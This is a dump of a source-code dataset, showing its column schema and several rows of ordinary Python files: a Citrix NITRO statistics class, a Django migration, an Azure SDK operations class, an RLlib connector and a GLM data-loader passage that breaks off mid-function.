| Column | Type | Range / distinct values |
|---|---|---|
| blob_id | string | length 40 – 40 |
| directory_id | string | length 40 – 40 |
| path | string | length 3 – 616 |
| content_id | string | length 40 – 40 |
| detected_licenses | list | length 0 – 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 – 115 |
| snapshot_id | string | length 40 – 40 |
| revision_id | string | length 40 – 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M (nullable) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 (nullable) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 (nullable) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | list | length 1 – 1 |
| author_id | string | length 1 – 132 |
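The columns above are easiest to explore programmatically; the sketch below shows how a split with this schema might be loaded and filtered with the Hugging Face `datasets` library. The dataset id is a placeholder, not the actual repository name.

```python
# Hedged sketch: stream a split with the schema above and inspect a few columns.
# "user/example-code-dataset" is a placeholder id; substitute the real one.
from datasets import load_dataset

ds = load_dataset("user/example-code-dataset", split="train", streaming=True)

for row in ds.take(3):
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])

# Keep only non-vendored, non-generated files under 100 kB.
small_files = ds.filter(
    lambda r: not r["is_vendor"] and not r["is_generated"] and r["length_bytes"] < 100_000
)
```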
5f570981e26c2bac4086a1ffe4a40b861456aeb1 | 687928e5bc8d5cf68d543005bb24c862460edcfc | /nssrc/com/citrix/netscaler/nitro/resource/stat/network/rnatip_stats.py | ff47d65c3c79e5bbfd9e2bf5f9e1a3baa6292bb4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0"
] | permissive | mbs91/nitro | c6c81665d6abd04de8b9f09554e5e8e541f4a2b8 | be74e1e177f5c205c16126bc9b023f2348788409 | refs/heads/master | 2021-05-29T19:24:04.520762 | 2015-06-26T02:03:09 | 2015-06-26T02:03:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,255 | py | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class rnatip_stats(base_resource) :
""" Statistics for RNAT ipaddress resource.
"""
def __init__(self) :
self._Rnatip = ""
self._clearstats = ""
self._iptd = 0
self._iprnattotrxbytes = 0
self._iprnatrxbytesrate = 0
self._iprnattottxbytes = 0
self._iprnattxbytesrate = 0
self._iprnattotrxpkts = 0
self._iprnatrxpktsrate = 0
self._iprnattottxpkts = 0
self._iprnattxpktsrate = 0
self._iprnattottxsyn = 0
self._iprnattxsynrate = 0
self._iprnatcursessions = 0
@property
def Rnatip(self) :
"""Specifies the NAT IP address of the configured RNAT entry for which you want to see the statistics. If you do not specify an IP address, this displays the statistics for all the configured RNAT entries.<br/>Minimum length = 1.
"""
try :
return self._Rnatip
except Exception as e:
raise e
@Rnatip.setter
def Rnatip(self, Rnatip) :
"""Specifies the NAT IP address of the configured RNAT entry for which you want to see the statistics. If you do not specify an IP address, this displays the statistics for all the configured RNAT entries.
"""
try :
self._Rnatip = Rnatip
except Exception as e:
raise e
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def iprnatrxpktsrate(self) :
"""Rate (/s) counter for iprnattotrxpkts.
"""
try :
return self._iprnatrxpktsrate
except Exception as e:
raise e
@property
def iprnattxpktsrate(self) :
"""Rate (/s) counter for iprnattottxpkts.
"""
try :
return self._iprnattxpktsrate
except Exception as e:
raise e
@property
def iprnattottxpkts(self) :
"""Packets sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxpkts
except Exception as e:
raise e
@property
def iptd(self) :
"""Traffic domain for ipaddr.
"""
try :
return self._iptd
except Exception as e:
raise e
@property
def iprnattottxbytes(self) :
"""Bytes sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxbytes
except Exception as e:
raise e
@property
def iprnatcursessions(self) :
"""Currently active RNAT sessions started from this IP address.
"""
try :
return self._iprnatcursessions
except Exception as e:
raise e
@property
def iprnatrxbytesrate(self) :
"""Rate (/s) counter for iprnattotrxbytes.
"""
try :
return self._iprnatrxbytesrate
except Exception as e:
raise e
@property
def iprnattotrxbytes(self) :
"""Bytes received on this IP address during RNAT sessions.
"""
try :
return self._iprnattotrxbytes
except Exception as e:
raise e
@property
def iprnattxsynrate(self) :
"""Rate (/s) counter for iprnattottxsyn.
"""
try :
return self._iprnattxsynrate
except Exception as e:
raise e
@property
def iprnattxbytesrate(self) :
"""Rate (/s) counter for iprnattottxbytes.
"""
try :
return self._iprnattxbytesrate
except Exception as e:
raise e
@property
def iprnattotrxpkts(self) :
"""Packets received on this IP address during RNAT sessions.
"""
try :
return self._iprnattotrxpkts
except Exception as e:
raise e
@property
def iprnattottxsyn(self) :
"""Requests for connections sent from this IP address during RNAT sessions.
"""
try :
return self._iprnattottxsyn
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(rnatip_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.rnatip
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.Rnatip) :
return str(self.Rnatip)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all rnatip_stats resources that are configured on netscaler.
"""
try :
obj = rnatip_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.Rnatip = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class rnatip_response(base_response) :
def __init__(self, length=1) :
self.rnatip = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.rnatip = [rnatip_stats() for _ in range(length)]
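The two classes above follow the usual NITRO stat-resource pattern: `rnatip_stats.get(service)` fetches statistics for every configured RNAT entry, or for a single entry when an IP address is supplied. A hypothetical usage sketch (the NSIP address and credentials are placeholders, not values from the source):

```python
# Hedged example: query RNAT IP statistics through a NITRO client session.
from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
from nssrc.com.citrix.netscaler.nitro.resource.stat.network.rnatip_stats import rnatip_stats

client = nitro_service("10.0.0.1", "http")      # placeholder NSIP / protocol
client.set_credential("nsroot", "password")     # placeholder credentials
client.login()

stats = rnatip_stats.get(client)                # all configured RNAT entries
for entry in stats or []:
    print(entry.Rnatip, entry.iprnatcursessions, entry.iprnattotrxbytes)

client.logout()
```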
| [
"[email protected]"
] | |
3fe7e554cfc697b434f4888e6a7b0dd0b813f539 | 4b850a7766d659ef936978e3051b35864fe6d04a | /source/images/topomut_exp_decay_2.py | 9ab6f25bdbdd97f25cd740507ef96ba5f0178564 | [] | no_license | bogdanvuk/phd | 239720dc9c396c500994d41cdf72d1870a358804 | 3ba99aa16a9a2553bae28107636473ebf9b04dd0 | refs/heads/master | 2020-12-29T19:03:41.821908 | 2016-11-20T10:26:29 | 2016-11-20T10:26:29 | 68,291,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from topomut_exp_decay import plot_topomut
plt = plot_topomut(180, 60, topo_mut=[0.6], loc="lower right")
plt.show()
| [
"[email protected]"
] | |
168517ec05262d912eb911a4fbe552334aea188a | 5a43074c6c26a5dca27ba15a09468de0a2c7c654 | /chapt9/train2/train2.py | 25ee22110f449cf88a49a64a276720e65e0de135 | [] | no_license | NHRD/The-second | 76e922da542da5e7bb36a14d6bd942eb0a9d2c98 | cb02544e23b826345224d9591d0e23499485aae0 | refs/heads/master | 2020-03-17T00:49:11.022011 | 2018-05-13T12:38:14 | 2018-05-13T12:38:14 | 133,130,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | import cubed
num = float(input("Input float num:"))
result = cubed.cubic(num)
print(result)
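The companion `cubed` module imported above is not included in this snippet; a minimal guess at what it provides, assuming `cubic(x)` simply returns the cube of its argument:

```python
# cubed.py -- hypothetical reconstruction of the module train2.py imports.
def cubic(x):
    """Return the cube of x, e.g. cubic(2.0) -> 8.0."""
    return x ** 3
```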
| [
"[email protected]"
] | |
783de3fff23bcde48f9048bc5d4df16607e2da6c | 39157aabbbab0f7824138a31ee26fbf88853e601 | /users/migrations/0001_initial.py | 2aeb55036fc284fbf105e0ea7fffddaaa53843ef | [
"MIT"
] | permissive | CecileSerene/uptv | 825d9bb0dc7e44cc8e7224632403b82f30443b07 | 47bd79b34d409405396e9640c18578837d45e91b | refs/heads/master | 2020-04-10T22:59:43.281114 | 2018-11-06T12:22:32 | 2018-11-06T12:22:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,952 | py | # Generated by Django 2.1.2 on 2018-10-12 08:34
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('avatar', models.ImageField(blank=True, null=True, upload_to='')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
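This initial migration creates a custom user model that extends Django's standard auth user with an optional `avatar` image. A minimal sketch of the model definition that would generate such a migration (reconstructed from the migration itself, not copied from the project):

```python
# users/models.py -- hedged reconstruction based on the fields in the migration.
from django.contrib.auth.models import AbstractUser
from django.db import models


class User(AbstractUser):
    # Matches the optional, nullable ImageField declared above.
    avatar = models.ImageField(blank=True, null=True)
```

For Django to pick this model up, the project's settings would also need to point `AUTH_USER_MODEL` at `'users.User'`.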
| [
"[email protected]"
] | |
f3d08f6599133229000a463854dc0c353b87bf4c | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_peer_express_route_circuit_connections_operations.py | 9c16d68810402a80d26aeca6f5d45cd563bb9ae9 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 9,352 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PeerExpressRouteCircuitConnectionsOperations:
"""PeerExpressRouteCircuitConnectionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
circuit_name: str,
peering_name: str,
connection_name: str,
**kwargs
) -> "_models.PeerExpressRouteCircuitConnection":
"""Gets the specified Peer Express Route Circuit Connection from the specified express route
circuit.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param circuit_name: The name of the express route circuit.
:type circuit_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:param connection_name: The name of the peer express route circuit connection.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PeerExpressRouteCircuitConnection, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.PeerExpressRouteCircuitConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PeerExpressRouteCircuitConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections/{connectionName}'} # type: ignore
def list(
self,
resource_group_name: str,
circuit_name: str,
peering_name: str,
**kwargs
) -> AsyncIterable["_models.PeerExpressRouteCircuitConnectionListResult"]:
"""Gets all global reach peer connections associated with a private peering in an express route
circuit.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param circuit_name: The name of the circuit.
:type circuit_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PeerExpressRouteCircuitConnectionListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.PeerExpressRouteCircuitConnectionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PeerExpressRouteCircuitConnectionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'circuitName': self._serialize.url("circuit_name", circuit_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PeerExpressRouteCircuitConnectionListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCircuits/{circuitName}/peerings/{peeringName}/peerConnections'} # type: ignore
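Callers normally reach this operations class through the generated management client rather than instantiating it directly; a hedged sketch (subscription id, resource group, circuit and peering names are placeholders):

```python
# Hedged example: list peer connections with the async NetworkManagementClient.
import asyncio

from azure.identity.aio import DefaultAzureCredential
from azure.mgmt.network.aio import NetworkManagementClient


async def main():
    credential = DefaultAzureCredential()
    client = NetworkManagementClient(credential, "<subscription-id>")
    async with client, credential:
        async for conn in client.peer_express_route_circuit_connections.list(
            "my-rg", "my-circuit", "AzurePrivatePeering"
        ):
            print(conn.name)


asyncio.run(main())
```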
| [
"[email protected]"
] | |
bc0bcf60649a00c4d9f7212b42af2077cb311863 | d954e2f74d1186c8e35be8ea579656513d8d3b98 | /rllib/connectors/agent/obs_preproc.py | 93f016e1e22a3f7275f5ed6e1bc017d7b3ecd56e | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vakker/ray | a865de214e60f9e62d61c03ae7ce55ad6030f84c | de238dd626a48a16c8b3cd006f3482db75f63a83 | refs/heads/master | 2023-01-23T22:30:44.839942 | 2022-10-23T01:05:48 | 2022-10-23T01:05:48 | 171,845,804 | 0 | 1 | Apache-2.0 | 2023-01-14T08:01:04 | 2019-02-21T09:54:36 | Python | UTF-8 | Python | false | false | 2,447 | py | from typing import Any
from ray.rllib.connectors.connector import (
AgentConnector,
ConnectorContext,
register_connector,
)
from ray.rllib.models.preprocessors import get_preprocessor
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.typing import AgentConnectorDataType
from ray.util.annotations import PublicAPI
# Bridging between current obs preprocessors and connector.
# We should not introduce any new preprocessors.
# TODO(jungong) : migrate and implement preprocessor library in Connector framework.
@PublicAPI(stability="alpha")
class ObsPreprocessorConnector(AgentConnector):
"""A connector that wraps around existing RLlib observation preprocessors.
This includes:
- OneHotPreprocessor for Discrete and Multi-Discrete spaces.
- GenericPixelPreprocessor and AtariRamPreprocessor for Atari spaces.
- TupleFlatteningPreprocessor and DictFlatteningPreprocessor for flattening
arbitrary nested input observations.
- RepeatedValuesPreprocessor for padding observations from RLlib Repeated
observation space.
"""
def __init__(self, ctx: ConnectorContext):
super().__init__(ctx)
if hasattr(ctx.observation_space, "original_space"):
# ctx.observation_space is the space this Policy deals with.
# We need to preprocess data from the original observation space here.
obs_space = ctx.observation_space.original_space
else:
obs_space = ctx.observation_space
self._preprocessor = get_preprocessor(obs_space)(
obs_space, ctx.config.get("model", {})
)
def transform(self, ac_data: AgentConnectorDataType) -> AgentConnectorDataType:
d = ac_data.data
assert (
type(d) == dict
), "Single agent data must be of type Dict[str, TensorStructType]"
if SampleBatch.OBS in d:
d[SampleBatch.OBS] = self._preprocessor.transform(d[SampleBatch.OBS])
if SampleBatch.NEXT_OBS in d:
d[SampleBatch.NEXT_OBS] = self._preprocessor.transform(
d[SampleBatch.NEXT_OBS]
)
return ac_data
def to_state(self):
return ObsPreprocessorConnector.__name__, None
@staticmethod
def from_state(ctx: ConnectorContext, params: Any):
return ObsPreprocessorConnector(ctx)
register_connector(ObsPreprocessorConnector.__name__, ObsPreprocessorConnector)
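A rough, version-dependent sketch of exercising the connector on its own, assuming `ConnectorContext` accepts `config` and `observation_space` keyword arguments as used elsewhere in this connector framework:

```python
# Hedged example: one-hot preprocessing of a Discrete observation.
# Constructor arguments may differ between RLlib versions.
import gym  # newer Ray versions use gymnasium instead

from ray.rllib.connectors.agent.obs_preproc import ObsPreprocessorConnector
from ray.rllib.connectors.connector import ConnectorContext
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.typing import AgentConnectorDataType

ctx = ConnectorContext(config={"model": {}}, observation_space=gym.spaces.Discrete(4))
connector = ObsPreprocessorConnector(ctx)

data = AgentConnectorDataType("env_0", "agent_0", {SampleBatch.OBS: 2})
out = connector.transform(data)
print(out.data[SampleBatch.OBS])  # expected: one-hot vector such as [0., 0., 1., 0.]
```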
| [
"[email protected]"
] | |
f3123e9c31e2c9ec19753cac3d6daa669ffa7fe7 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/foundation/GLM-10B/configure_data.py | 9365cd518877885c9f0a276a850b14ec9414fab1 | [
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 18,384 | py | # coding=utf-8
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
# Copyright 2023 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""parses arguments and preps data loader"""
import os
import copy
import random
import numpy as np
import torch
import torch.utils.data
import data_utils
from blocklm_utils import ConstructBlockStrategy
from data_utils.tokenization import make_tokenizer
from utils import print_rank_0
from itertools import accumulate
from bisect import bisect_right
from tasks.superglue.dataset import SuperGlueDataset
import mpu
class MultiTaskDataset(torch.utils.data.Dataset):
def __init__(self, tasks, datasets, reweight=True, temperature=0.8, max_limit=200000):
super(MultiTaskDataset, self).__init__()
self.tasks = tasks
self.datasets = datasets
self.reweight = reweight
self.temperature = temperature
self.lens = [len(dataset) for dataset in datasets]
self.weights = np.array([min(l, max_limit) ** temperature for l in self.lens])
self.total_len = sum(self.lens)
self.cumulative_lens = list(accumulate(self.lens))
if self.reweight:
print_rank_0(list(zip(self.tasks, self.lens, self.weights)))
else:
print_rank_0(list(zip(self.tasks, self.lens)))
self.weights /= self.weights.sum()
def __len__(self):
return self.total_len * 1000
@staticmethod
def pet_wrapper(data):
text = data['text']
loss_mask = data['logit_mask']
target = data['target']
attention_mask = data['mask']
position_id = data['position']
label = data['label']
if len(text.shape) == 2:
text = text[label]
loss_mask = loss_mask[label]
target = target[label]
attention_mask = attention_mask[label]
position_id = position_id[label]
else:
target = target[label]
if not target.shape:
target = target.repeat(len(text))
return {'text': text, 'target': target, 'loss_mask': loss_mask, 'position_id': position_id,
'attention_mask': attention_mask}
def __getitem__(self, idx):
if self.reweight:
rng = random.Random(idx)
rng = np.random.RandomState(seed=[rng.randint(0, 2 ** 32 - 1) for _ in range(16)])
dataset_idx = rng.choice(np.arange(len(self.datasets)), p=self.weights)
dataset = self.datasets[dataset_idx]
sample_idx = rng.choice(np.arange(len(dataset)))
item = self.datasets[dataset_idx][sample_idx]
else:
dataset_idx = bisect_right(self.cumulative_lens, idx)
if dataset_idx == 0:
sample_idx = idx
else:
sample_idx = idx - self.cumulative_lens[dataset_idx - 1]
item = self.datasets[dataset_idx][sample_idx]
item = self.pet_wrapper(item)
return item
class DataConfig:
def __init__(self, defaults=None):
super(DataConfig, self).__init__()
if defaults is None:
defaults = {}
self.defaults = defaults
def apply(self, args, tokenizer):
if torch.distributed.get_rank() == 0:
print('configuring data')
self.apply_defaults(args)
return make_loaders(args, tokenizer)
def set_defaults(self, **kwargs):
for k, v in kwargs.items():
self.defaults[k] = v
def apply_defaults(self, args):
for k, v in self.defaults.items():
k = k.replace('-', '_')
if not hasattr(args, k):
setattr(args, k, v)
def prepare_tokenizer(args):
add_sentinel_token = 0
if args.sentinel_token:
add_sentinel_token = args.max_position_embeddings
tokenizer = make_tokenizer(args.tokenizer_type, None, args.tokenizer_path, args.vocab_size,
args.tokenizer_model_type, add_block_symbols=args.block_lm, cache_dir=args.cache_dir,
add_sentinel_token=add_sentinel_token, add_task_mask=args.task_mask,
add_decoder_mask=args.block_mask_prob > 0.0 or args.context_mask_ratio > 0.0,
fix_command_token=args.fix_command_token)
if mpu.get_model_parallel_rank() == 0:
num_tokens = tokenizer.num_tokens
eod_token = tokenizer.get_command('eos').Id
assert eod_token == tokenizer.get_command('pad').Id
before = num_tokens
after = before
multiple = args.make_vocab_size_divisible_by
while (after % multiple) != 0:
after += 1
print_rank_0('> padded vocab (size: {}) with {} dummy '
'tokens (new size: {})'.format(before, after - before, after))
print_rank_0('> found end-of-document token: {}'.format(eod_token))
token_counts = torch.cuda.LongTensor([after, eod_token])
else:
token_counts = torch.cuda.LongTensor([0, 0])
# Broadcast num tokens.
torch.distributed.broadcast(token_counts,
mpu.get_model_parallel_src_rank(),
group=mpu.get_model_parallel_group())
num_tokens = token_counts[0].item()
eod_token = token_counts[1].item()
args.vocab_size, args.eod_token = num_tokens, eod_token
return tokenizer
def make_data_loader(dataset, tokenizer, batch_size, num_iters, args, shuffle=False, block_collate=False):
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
rank = torch.distributed.get_rank(group=mpu.get_data_parallel_group())
if args.loader_scatter is not None:
rank = rank // args.loader_scatter
world_size = world_size // args.loader_scatter
batch_size = batch_size // args.loader_scatter
distributed = world_size > 1
if args.transformer_xl:
batch_sampler = data_utils.samplers.DistributedSequentialSampler(len(dataset),
num_iters,
batch_size,
rank,
world_size)
else:
if shuffle:
sampler = data_utils.samplers.RandomSampler(dataset, replacement=True,
num_samples=batch_size * args.train_iters * args.gradient_accumulation_steps)
else:
sampler = torch.utils.data.SequentialSampler(dataset)
drop_last = distributed
# the GPUs in the same model parallel group receive the same data
if distributed:
batch_sampler = data_utils.samplers.DistributedBatchSampler(sampler, batch_size, drop_last, rank,
world_size,
gradient_accumulation_steps=args.gradient_accumulation_steps)
else:
batch_sampler = torch.utils.data.BatchSampler(sampler,
batch_size,
drop_last)
